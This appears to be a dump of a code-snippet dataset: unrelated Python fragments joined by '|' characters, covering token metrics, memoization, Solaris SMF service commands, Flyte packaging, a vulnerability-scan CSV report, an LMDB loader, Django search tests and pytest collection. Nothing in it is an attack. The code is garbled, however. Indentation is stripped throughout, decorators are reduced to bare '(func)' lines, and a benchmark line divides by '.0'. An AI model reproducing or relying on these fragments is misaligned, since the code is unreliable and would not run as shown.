prompt_tokens = metrics.prompt_tokens
if (completion_tokens is None):
completion_tokens = metrics.completion_tokens
if (total_tokens is None):
total_tokens = metrics.total_tokens
if (is_first_generate and (completion_tokens is not None)):
metrics.first_completion_tokens = completion_tokens
if (completion_tokens == 1):
metrics.first_token_time_ms = metrics.first_completion_time_ms
if ((not is_first_generate) and (metrics.first_token_time_ms is None) and (completion_tokens == 1)):
metrics.first_token_time_ms = (time.time_ns() // 1000000)
if prompt_tokens:
metrics.prompt_tokens = prompt_tokens
if completion_tokens:
metrics.completion_tokens = completion_tokens
if total_tokens:
metrics.total_tokens = total_tokens
elif (prompt_tokens and completion_tokens):
total_tokens = (prompt_tokens + completion_tokens)
metrics.total_tokens = total_tokens
if total_tokens:
duration = ((metrics.current_time_ms - metrics.start_time_ms) / 1000.0)
metrics.speed_per_second = (total_tokens / duration)
current_gpu_infos = _get_current_cuda_memory()
metrics.current_gpu_infos = current_gpu_infos
if (not metrics.avg_gpu_infos):
metrics.avg_gpu_infos = current_gpu_infos
elif current_gpu_infos:
for (i, last_avg) in enumerate(metrics.avg_gpu_infos):
allocated_memory_gb = ((last_avg.allocated_memory_gb * (metrics.collect_index - 1)) + current_gpu_infos[i].allocated_memory_gb)
metrics.avg_gpu_infos[i].allocated_memory_gb = (allocated_memory_gb / metrics.collect_index)
metrics.avg_gpu_infos[i].total_memory_gb = current_gpu_infos[i].total_memory_gb
metrics.avg_gpu_infos[i].cached_memory_gb = current_gpu_infos[i].cached_memory_gb
metrics.avg_gpu_infos[i].available_memory_gb = current_gpu_infos[i].available_memory_gb
return metrics |
def memoize(func):
(func)
def wrapper(*args, **kwargs):
key = (args, frozenset(sorted(kwargs.items())))
try:
return cache[key]
except KeyError:
ret = cache[key] = func(*args, **kwargs)
return ret
def cache_clear():
cache.clear()
cache = {}
wrapper.cache_clear = cache_clear
return wrapper |
def run(args, dataset):
print('')
print(' #Layer Input Hidden Output Batch Time(s)/step QPS Rate(TF/s)')
print('')
for i in range(len(dataset)):
(layer_num, input_size, hidden_size, output_size, batch_size) = dataset[i]
elap = run_single(args, layer_num, input_size, hidden_size, output_size, batch_size)
elap /= args.steps
flops = (batch_size * ((((hidden_size * hidden_size) * layer_num) + (hidden_size * input_size)) + (hidden_size * output_size)))
flops *= 2
QPS = (batch_size / elap)
print('{0:6}, {1:6}, {2:6}, {3:6}, {4:6}, {5:10.6f}, {6:8.1f}, {7:10.1f}'.format(layer_num, input_size, hidden_size, output_size, batch_size, elap, QPS, ((flops / elap) / .0))) |
class SMFCmd(Cmd):
def _service_status(self, fmri, columns=('state',), remote=False):
return self._run_cmd('_service_status', fmri, ','.join(columns), stderr_to_stdout=True, remote=remote)
def _service_enable(self, fmri, remote=False):
return self._run_cmd('_service_enable', fmri, remote=remote)
def _service_disable(self, fmri, remote=False):
return self._run_cmd('_service_disable', fmri, remote=remote)
def _service_restart(self, fmri, remote=False):
return self._run_cmd('_service_restart', fmri, remote=remote)
def _service_validate(self, manifest_file, remote=False):
return self._run_cmd('_service_validate', manifest_file, remote=remote)
def _service_import(self, fmri, manifest_file, remote=False):
return self._run_cmd('_service_import', fmri, manifest_file, remote=remote)
def _service_export(self, fmri, remote=False):
return self._run_cmd('_service_export', fmri, remote=remote)
def _service_delete(self, fmri, remote=False):
return self._run_cmd('_service_delete', fmri, remote=remote)
def _service_save(self, fmri, remote=False):
return self._run_cmd('_service_save', fmri, remote=remote)
def _service_exists(self, fmri, remote=False):
try:
self._service_export(fmri, remote=remote)
except CmdError as exc:
if ("doesn't match any service" in exc.msg):
return False
else:
raise exc
else:
return True
def _service_instance_import(self, fmri, manifest_file, remote=False):
return self._run_cmd('_service_instance_import', fmri, manifest_file, remote=remote)
def _service_instance_delete(self, fmri, name, remote=False):
return self._run_cmd('_service_instance_delete', fmri, name, remote=remote)
def _service_instance_exists(self, fmri, remote=False):
try:
self._service_status(fmri, remote=remote)
except CmdError as exc:
if ("doesn't match any instances" in exc.msg):
return False
else:
raise exc
else:
return True |
def package(serializable_entities: typing.List[FlyteControlPlaneEntity], source: str='.', output: str='./flyte-package.tgz', fast: bool=False, deref_symlinks: bool=False):
if (not serializable_entities):
raise NoSerializableEntitiesError('Nothing to package')
with tempfile.TemporaryDirectory() as output_tmpdir:
persist_registrable_entities(serializable_entities, output_tmpdir)
if fast:
if (os.path.abspath(output).startswith(os.path.abspath(source)) and os.path.exists(output)):
click.secho(f'{output} already exists within {source}, deleting and re-creating it', fg='yellow')
os.remove(output)
archive_fname = fast_registration.fast_package(source, output_tmpdir, deref_symlinks)
click.secho(f'Fast mode enabled: compressed archive {archive_fname}', dim=True)
with tarfile.open(output, 'w:gz') as tar:
tar.add(output_tmpdir, arcname='')
click.secho(f'Successfully packaged {len(serializable_entities)} flyte objects into {output}', fg='green') |
class IssueReport(object):
def __init__(self):
filename = (('pyfiscan-vulnerabilities-' + time.strftime('%Y-%m-%d')) + '.csv')
if os.path.islink(filename):
sys.exit(('CSV-file %s is a symlink. Exiting..' % filename))
self.csvfile = open(filename, 'a')
os.chmod(filename, (stat.S_IREAD | stat.S_IWRITE))
self.writer = csv.writer(self.csvfile, delimiter='|', quotechar='|')
def close(self):
if self.csvfile:
self.csvfile.close()
def add(self, appname, item, file_version, secure_version, cve):
self.writer.writerow((get_timestamp(), appname, item, file_version, secure_version, cve)) |
class LmdbDataProvider():
def __init__(self, path='/mnt/fq_ssd/fq/FOF/lmdb_512') -> None:
self.db = None
self.path = path
def open_db(self):
self.db = lmdb.open(self.path, subdir=True, readonly=True, lock=False, readahead=False, meminit=False)
def get_data_base(self, name, vid, lid):
with self.db.begin(write=False) as txn:
mpi = txn.get(('%s_%03d_mpi' % (name, vid)).encode())
img = txn.get(('%s_%03d_%03d' % (name, vid, lid)).encode())
img = cv2.imdecode(np.frombuffer(img, np.uint8), (- 1))
mpi = np.load(BytesIO(mpi))
return {'img': img, 'mpi': mpi} |
class SearchFilterToManyTests(TestCase):
def setUpTestData(cls):
b1 = Blog.objects.create(name='Blog 1')
b2 = Blog.objects.create(name='Blog 2')
Entry.objects.create(blog=b1, headline='Something about Lennon', pub_date=datetime.date(1979, 1, 1))
Entry.objects.create(blog=b1, headline='Another thing about Lennon', pub_date=datetime.date(1979, 6, 1))
Entry.objects.create(blog=b2, headline='Something unrelated', pub_date=datetime.date(1979, 1, 1))
Entry.objects.create(blog=b2, headline='Retrospective on Lennon', pub_date=datetime.date(1990, 6, 1))
def test_multiple_filter_conditions(self):
class SearchListView(generics.ListAPIView):
queryset = Blog.objects.all()
serializer_class = BlogSerializer
filter_backends = (filters.SearchFilter,)
search_fields = ('=name', 'entry__headline', '=entry__pub_date__year')
view = SearchListView.as_view()
request = factory.get('/', {'search': 'Lennon,1979'})
response = view(request)
assert (len(response.data) == 1) |
class TildeSmartProcessor(util.PatternSequenceProcessor):
PATTERNS = [util.PatSeqItem(re.compile(SMART_DEL_SUB, (re.DOTALL | re.UNICODE)), 'double', 'del,sub'), util.PatSeqItem(re.compile(SMART_SUB_DEL, (re.DOTALL | re.UNICODE)), 'double', 'sub,del'), util.PatSeqItem(re.compile(SMART_DEL_SUB2, (re.DOTALL | re.UNICODE)), 'double', 'del,sub'), util.PatSeqItem(re.compile(SMART_DEL, (re.DOTALL | re.UNICODE)), 'single', 'del'), util.PatSeqItem(re.compile(SUB2, (re.DOTALL | re.UNICODE)), 'single', 'sub', True), util.PatSeqItem(re.compile(SUB, (re.DOTALL | re.UNICODE)), 'single', 'sub')] |
class ModelCard(object):
def __init__(self, config_json=None):
self.lc = LocalCard(config_json=config_json)
self.mc = MetadataCard(config_json=config_json)
self.ac = AirtableCard(config_json=config_json)
self.rc = ReadmeCard(config_json=config_json)
def _get(self, model_id):
card = self.lc.get(model_id)
if (card is not None):
return card
card = self.mc.get(model_id)
if (card is not None):
return card
card = self.ac.get(model_id)
if (card is not None):
return card
card = self.rc.get(model_id)
if (card is not None):
return card
def get(self, model_id, as_json=False):
card = self._get(model_id)
if (card is None):
return
if as_json:
return json.dumps(card, indent=4)
else:
return card |
class ServicePlanTestInstanceCollector(Instance):
def collect(self):
collected = (super(ServicePlanTestInstanceCollector, self).collect() or [])
for test_data in self.obj.get_fixture_test_information():
collected.append(ServicePlanTestCaseTestFunction(parent=self, fixture_test_case_data=test_data))
PLUGIN_STATISTICS['fixture_tests_collected'] += 1
unittest_skip = getattr(self.parent.obj, '__unittest_skip__', False)
unittest_skip_why = getattr(self.parent.obj, '__unittest_skip_why__', '')
for item in collected:
skipped = False
if any((((m.name == 'skip') or ((m.name == 'skipif') and m.args and m.args[0])) for m in (item.own_markers or []))):
skipped = True
elif unittest_skip:
item.add_marker(pytest.mark.skip(reason=unittest_skip_why))
skipped = True
if (skipped and isinstance(item, ServicePlanTestCaseTestFunction)):
PLUGIN_STATISTICS['fixture_tests_skipped'] += 1
return collected |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.